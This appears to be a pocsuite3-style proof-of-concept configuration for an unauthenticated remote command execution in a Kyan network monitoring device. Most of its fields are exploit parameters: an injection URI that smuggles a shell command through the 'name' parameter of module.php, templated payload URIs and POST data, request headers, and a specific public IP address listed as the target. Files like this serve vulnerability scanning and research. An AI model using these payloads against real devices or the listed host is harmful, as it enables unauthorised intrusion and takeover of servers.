CLASSNAME = 'Kyan_LDY_2022_00139341'
VUL_ID = 'LDY-2022-00139341'
VUL_DATE = '2019-10-17'
CREATEDATE = '2022-12-30'
UPDATEDATE = '2022-12-30'
APP_NAME = 'Kyan'
VUL_NAME = '远程命令执行(RCE)' #漏洞名称
VUL_NUM  = 'LDY-2022-00139341' #漏洞编号
CVE_NUM = '' #CVE编号
CNVD_NUM = '' #CNVD编号
VUL_TYPE = 'CODE_EXECUTION' # 必填，漏洞类型，参考 pocsuite3 VUL_TYPE的取值范围
POC_CATEGORY = 'EXPLOITS.WEBAPP' # 必填，漏洞分类，参考 pocsuite3 POC_CATEGORY的取值范围
SEVERITY = 'Critical' # 必填，严重等级，取值范围 Critical , High , Medium, Low
REQAUTH = 'False' # 必填，boolen值，该漏洞验证或利用是否需要先认证
FINGERPRINT_NAMES = 'Kyan' # 必填，当命中哪些指纹后，可使用该poc。列表中是指纹的名称
APP_MAIN_PORT = '800' # 必填，该应用的默认配置端口，用于快速扫描模式，若无法确认可以写80
APPVERSION = 'Kyan' # 必填，漏洞影响的版本号
APP_POWER_LINK = 'http://www.Kyan.com' # 非必填，应用厂商链接
DESC = 'Kyan_未授权下执行任意命令, 可以获取服务器权限，/module.php?cmd=delete&name=;id>1.txt;存在远程命令执行漏洞'
SUGGEST = '厂商已发布更新，请及时关注:http://www.Kyan.com/'
HASEXP = 'True' # 必填，boolen值，是否包含exp
TARGETS = 'http://218.202.96.46:800/' # 必填，该Poc适用的目标，string类型
SURICATA_RULES = 'cmd' # 必填，suricata格式的检测规则,这里只需要填写匹配流量包关键词即可
COMMAND = ''
FILE_PATH = '#' #如果不使用file_path=传shell地址，可以使用"#"进行传参数
REFERENCES = 'https://anpaini.com/2022/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/Kyan%20%E7%BD%91%E7%BB%9C%E7%9B%91%E6%8E%A7%E8%AE%BE%E5%A4%87%20module.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%' # 非必填，漏洞相关参考链接
URI = '/module.php?cmd=delete&name=;{param}>1.txt;' #payload请求uri
PAYLOAD_DATA = 'mail_address=%3B{param}%3B&button=%83%81%81%5B%83%8B%91%97%90M' #传入的data数据
METHOD = 'get' # request 请求方式 get、post
HEADERS = "{'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0','Content-Type': 'application/x-www-form-urlencoded'}"
ATTACK_PAYLOAD_DATA = '1'
ATTACK_URI = "" #利用payload请求uri





